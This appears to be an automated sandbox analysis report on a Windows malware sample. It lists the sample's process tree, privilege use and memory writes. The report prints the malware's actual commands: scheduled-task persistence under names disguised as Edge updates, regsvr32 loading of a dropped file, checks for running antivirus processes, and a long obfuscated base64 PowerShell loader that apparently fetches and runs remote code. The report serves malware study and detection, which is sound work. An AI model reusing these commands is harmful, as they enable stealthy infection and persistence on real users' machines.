pid Process 3004 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 3004 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 980 skotes.exe 980 skotes.exe 2776 jonbDes.exe 2776 jonbDes.exe 672 IJWSn6z.tmp 672 IJWSn6z.tmp 948 regsvr32.exe 948 regsvr32.exe 3512 powershell.exe 3512 powershell.exe 1480 powershell.exe 1480 powershell.exe 948 regsvr32.exe 948 regsvr32.exe 1256 powershell.exe 1256 powershell.exe 1256 powershell.exe 3540 powershell.exe 3540 powershell.exe 3540 powershell.exe 948 regsvr32.exe 948 regsvr32.exe 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 4960 skotes.exe 4960 skotes.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3512 powershell.exe Token: SeIncreaseQuotaPrivilege 3512 powershell.exe Token: SeSecurityPrivilege 3512 powershell.exe Token: SeTakeOwnershipPrivilege 3512 powershell.exe Token: SeLoadDriverPrivilege 3512 powershell.exe Token: SeSystemProfilePrivilege 3512 powershell.exe Token: SeSystemtimePrivilege 3512 powershell.exe Token: SeProfSingleProcessPrivilege 3512 powershell.exe Token: SeIncBasePriorityPrivilege 3512 powershell.exe Token: SeCreatePagefilePrivilege 3512 powershell.exe Token: SeBackupPrivilege 3512 powershell.exe Token: SeRestorePrivilege 3512 powershell.exe Token: SeShutdownPrivilege 3512 powershell.exe Token: SeDebugPrivilege 3512 powershell.exe Token: SeSystemEnvironmentPrivilege 3512 powershell.exe Token: SeRemoteShutdownPrivilege 3512 powershell.exe Token: SeUndockPrivilege 3512 powershell.exe Token: SeManageVolumePrivilege 3512 powershell.exe Token: 33 3512 powershell.exe Token: 34 3512 powershell.exe Token: 35 3512 powershell.exe Token: 36 3512 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeIncreaseQuotaPrivilege 1480 powershell.exe Token: SeSecurityPrivilege 1480 powershell.exe Token: SeTakeOwnershipPrivilege 1480 powershell.exe Token: SeLoadDriverPrivilege 1480 powershell.exe Token: SeSystemProfilePrivilege 1480 powershell.exe Token: SeSystemtimePrivilege 1480 powershell.exe Token: SeProfSingleProcessPrivilege 1480 powershell.exe Token: SeIncBasePriorityPrivilege 1480 powershell.exe Token: SeCreatePagefilePrivilege 1480 powershell.exe Token: SeBackupPrivilege 1480 powershell.exe Token: SeRestorePrivilege 1480 powershell.exe Token: SeShutdownPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeSystemEnvironmentPrivilege 1480 powershell.exe Token: SeRemoteShutdownPrivilege 1480 powershell.exe Token: SeUndockPrivilege 1480 powershell.exe Token: SeManageVolumePrivilege 1480 powershell.exe Token: 33 1480 powershell.exe Token: 34 1480 powershell.exe Token: 35 1480 powershell.exe Token: 36 1480 powershell.exe Token: SeIncreaseQuotaPrivilege 1480 powershell.exe Token: SeSecurityPrivilege 1480 powershell.exe Token: SeTakeOwnershipPrivilege 1480 powershell.exe Token: SeLoadDriverPrivilege 1480 powershell.exe Token: SeSystemProfilePrivilege 1480 powershell.exe Token: SeSystemtimePrivilege 1480 powershell.exe Token: SeProfSingleProcessPrivilege 1480 powershell.exe Token: SeIncBasePriorityPrivilege 1480 powershell.exe Token: SeCreatePagefilePrivilege 1480 powershell.exe Token: SeBackupPrivilege 1480 powershell.exe Token: SeRestorePrivilege 1480 powershell.exe Token: SeShutdownPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeSystemEnvironmentPrivilege 1480 powershell.exe Token: SeRemoteShutdownPrivilege 1480 powershell.exe Token: SeUndockPrivilege 1480 powershell.exe Token: SeManageVolumePrivilege 1480 powershell.exe Token: 33 1480 powershell.exe Token: 34 1480 powershell.exe Token: 35 1480 powershell.exe -
Suspicious use of FindShellTrayWindow 13 IoCs
pid Process 3004 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 672 IJWSn6z.tmp 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 3272 LCESjzR.tmp 4200 a19ddbcf22.exe 4200 a19ddbcf22.exe 4200 a19ddbcf22.exe 1920 client32.exe 2460 Macromedia.com 2460 Macromedia.com 2460 Macromedia.com -
Suspicious use of SendNotifyMessage 9 IoCs
pid Process 2560 Macromedia.com 2560 Macromedia.com 2560 Macromedia.com 4200 a19ddbcf22.exe 4200 a19ddbcf22.exe 4200 a19ddbcf22.exe 2460 Macromedia.com 2460 Macromedia.com 2460 Macromedia.com -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 948 regsvr32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3004 wrote to memory of 980 3004 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 83 PID 3004 wrote to memory of 980 3004 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 83 PID 3004 wrote to memory of 980 3004 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 83 PID 980 wrote to memory of 4264 980 skotes.exe 90 PID 980 wrote to memory of 4264 980 skotes.exe 90 PID 980 wrote to memory of 4264 980 skotes.exe 90 PID 980 wrote to memory of 2776 980 skotes.exe 93 PID 980 wrote to memory of 2776 980 skotes.exe 93 PID 980 wrote to memory of 2776 980 skotes.exe 93 PID 980 wrote to memory of 1160 980 skotes.exe 99 PID 980 wrote to memory of 1160 980 skotes.exe 99 PID 980 wrote to memory of 1160 980 skotes.exe 99 PID 980 wrote to memory of 3732 980 skotes.exe 103 PID 980 wrote to memory of 3732 980 skotes.exe 103 PID 980 wrote to memory of 3732 980 skotes.exe 103 PID 3732 wrote to memory of 4976 3732 IJWSn6z.exe 104 PID 3732 wrote to memory of 4976 3732 IJWSn6z.exe 104 PID 3732 wrote to memory of 4976 3732 IJWSn6z.exe 104 PID 4976 wrote to memory of 2732 4976 IJWSn6z.tmp 105 PID 4976 wrote to memory of 2732 4976 IJWSn6z.tmp 105 PID 4976 wrote to memory of 2732 4976 IJWSn6z.tmp 105 PID 2732 wrote to memory of 672 2732 IJWSn6z.exe 106 PID 2732 wrote to memory of 672 2732 IJWSn6z.exe 106 PID 2732 wrote to memory of 672 2732 IJWSn6z.exe 106 PID 672 wrote to memory of 844 672 IJWSn6z.tmp 107 PID 672 wrote to memory of 844 672 IJWSn6z.tmp 107 PID 672 wrote to memory of 844 672 IJWSn6z.tmp 107 PID 844 wrote to memory of 948 844 regsvr32.exe 108 PID 844 wrote to memory of 948 844 regsvr32.exe 108 PID 948 wrote to memory of 3512 948 regsvr32.exe 109 PID 948 wrote to memory of 3512 948 regsvr32.exe 109 PID 948 wrote to memory of 1480 948 regsvr32.exe 112 PID 948 wrote to memory of 1480 948 regsvr32.exe 112 PID 980 wrote to memory of 2276 980 skotes.exe 114 PID 980 wrote to memory of 2276 980 skotes.exe 114 PID 980 wrote to memory of 2276 980 skotes.exe 114 PID 980 wrote to memory of 4236 980 skotes.exe 115 PID 980 wrote to memory of 4236 980 skotes.exe 115 PID 980 wrote to memory of 4236 980 skotes.exe 115 PID 4236 wrote to memory of 1504 4236 tYrnx75.exe 116 PID 4236 wrote to memory of 1504 4236 tYrnx75.exe 116 PID 4236 wrote to memory of 1504 4236 tYrnx75.exe 116 PID 980 wrote to memory of 3744 980 skotes.exe 118 PID 980 wrote to memory of 3744 980 skotes.exe 118 PID 3744 wrote to memory of 4796 3744 UmN1TJS.exe 119 PID 3744 wrote to memory of 4796 3744 UmN1TJS.exe 119 PID 4796 wrote to memory of 3988 4796 cmd.exe 121 PID 4796 wrote to memory of 3988 4796 cmd.exe 121 PID 4264 wrote to memory of 3788 4264 13Z5sqy.exe 122 PID 4264 wrote to memory of 3788 4264 13Z5sqy.exe 122 PID 4264 wrote to memory of 3788 4264 13Z5sqy.exe 122 PID 3988 wrote to memory of 1256 3988 WScript.exe 123 PID 3988 wrote to memory of 1256 3988 WScript.exe 123 PID 1256 wrote to memory of 3540 1256 powershell.exe 125 PID 1256 wrote to memory of 3540 1256 powershell.exe 125 PID 1504 wrote to memory of 4216 1504 cmd.exe 127 PID 1504 wrote to memory of 4216 1504 cmd.exe 127 PID 1504 wrote to memory of 4216 1504 cmd.exe 127 PID 1504 wrote to memory of 4728 1504 cmd.exe 128 PID 1504 wrote to memory of 4728 1504 cmd.exe 128 PID 1504 wrote to memory of 4728 1504 cmd.exe 128 PID 4264 wrote to memory of 3788 4264 13Z5sqy.exe 122 PID 1504 wrote to memory of 316 1504 cmd.exe 129 PID 1504 wrote to memory of 316 1504 cmd.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe"C:\Users\Admin\AppData\Local\Temp\f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3788
-
-
-
C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2776
-
-
C:\Users\Admin\AppData\Local\Temp\1043273001\fok8xWd.exe"C:\Users\Admin\AppData\Local\Temp\1043273001\fok8xWd.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1160
-
-
C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Users\Admin\AppData\Local\Temp\is-MT01V.tmp\IJWSn6z.tmp"C:\Users\Admin\AppData\Local\Temp\is-MT01V.tmp\IJWSn6z.tmp" /SL5="$A0230,1104885,161792,C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe" /VERYSILENT5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Users\Admin\AppData\Local\Temp\is-EF9JU.tmp\IJWSn6z.tmp"C:\Users\Admin\AppData\Local\Temp\is-EF9JU.tmp\IJWSn6z.tmp" /SL5="$E0050,1104885,161792,C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe" /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:SYNC "C:\Users\Admin\AppData\Roaming\\uxtheme_2.drv"7⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\system32\regsvr32.exe/s /i:SYNC "C:\Users\Admin\AppData\Roaming\\uxtheme_2.drv"8⤵
- Loads dropped DLL
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{FA7BC360-7A5D-4EC8-F7C4-050988450400}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dllhost" /tr "C:\Users\Admin\AppData\Local\dllhost.exe"9⤵
- Scheduled Task/Job: Scheduled Task
PID:4552
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1051675001\mH0mZDF.exe"C:\Users\Admin\AppData\Local\Temp\1051675001\mH0mZDF.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2276 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4016
-
-
-
C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe"C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd4⤵
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:4216
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:4728
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:316
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵PID:1916
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7646615⤵
- System Location Discovery: System Language Discovery
PID:3748
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Fm5⤵
- System Location Discovery: System Language Discovery
PID:4332
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Tunnel" Addresses5⤵
- System Location Discovery: System Language Discovery
PID:4564
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com5⤵
- System Location Discovery: System Language Discovery
PID:2592
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F5⤵
- System Location Discovery: System Language Discovery
PID:1820
-
-
C:\Users\Admin\AppData\Local\Temp\764661\Macromedia.comMacromedia.com F5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2560 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1192
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵
- System Location Discovery: System Language Discovery
PID:3512
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 155⤵
- System Location Discovery: System Language Discovery
PID:316
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1051928001\UmN1TJS.exe"C:\Users\Admin\AppData\Local\Temp\1051928001\UmN1TJS.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67938ad15f2a9.vbs4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67938ad15f2a9.vbs"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@B0@H@@Og@v@C8@dQBw@HQ@bwBk@GE@d@Bl@HM@eQBz@HQ@ZQBt@C4@YwBv@G0@LwB0@GU@cwB0@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@